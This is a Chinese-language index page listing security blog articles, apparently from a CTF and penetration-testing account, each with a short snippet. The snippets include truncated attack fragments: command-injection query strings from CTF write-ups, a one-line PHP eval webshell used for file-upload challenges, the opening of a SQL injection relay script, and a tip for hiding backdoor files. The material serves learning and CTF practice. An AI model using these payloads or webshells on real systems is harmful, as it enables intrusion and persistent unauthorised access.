免责声明本公众号仅用于技术交流与学习,利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号只是知识的搬运工,取之于民用之于民。Exp# 写文件http://172...
三进三出 | 渗透实战
写了一个多月的各种方案,终于抽个空可以做点技术活了测试一个单位,其中一个官网,点进去一看,质朴中透露着一股有问题的气息,看了一下架构:IIS+PHP,美妙的组合。迅速定位到了一个点可能存在注入,但是,...
WAF绕过工具 -- aizawa
===================================免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负...
绕过CDN查找真实IP方法总结
声明:该公众号分享的安全工具和项目均来源于网络,仅供安全研究与学习之用,如用于其他用途,由使用者承担全部法律及连带责任,与工具作者和本公众号无关。0x00 CDN简述CDN全称ContentDeliv...
【原创】记一次ctf实战——2020-数字中国创新大赛虎符网络安全赛道-Web-just_escape
[huayang] 进去看看 有意思的点 去run.php看看 <?php if( array_key_exists( "code", $_GET ) && $_GET[...
【原创】记一次ctf实战—— CISCN-2019-初赛-Love Math (失败)
[huayang] 进去看看 <?php error_reporting(0); //听说你很喜欢数学,不知道你是否爱它胜过爱flag if(!isset($_GET['c'])){ ...
【原创】ctfshow—web入门—命令执行 (29-77)
[huayang] web29 ?c=echo `nl flag.php` web30 ?c=echo `nl fl\ag.p\hp` web31 ?C=highlight_file($_GET...
【原创】ctfshow—php特性 (89—150)
[huayang]web89 ?num[]= web90 ?num=4476. web91 ?cmd=%Aphp web92 ?num=0x117c web93 ?num=010574 we...
【原创 脚本】SQL脚本
[huayang] 有绕过请自行更改 中转注入 PHP版 简洁版 <?php $id=base64_encode("id=".$_GET['id']); echo file_get_c...
【原创】ctfshow—web文件上传
[huayang] web151——152 写入一句话改为png格式 <?php @eval(@$_POST['g']); ?> 上传并抓包并改包 连接蚁剑 web153 此题过...
【原创 超详细】哥斯拉及冰蝎的简单使用
[huayang] 实验环境均以 ctfshow— 文件上传 —web151 进行讲解 哥斯拉 下载地址:https://github.com/BeichenDream/Godzilla/releas...
【转载】php后门隐藏技巧大全
[huayang] 原文地址:https://www.freebuf.com/articles/web/248569.html 1. attrib +s +h 创建系统隐藏文件: attrib +s ...
147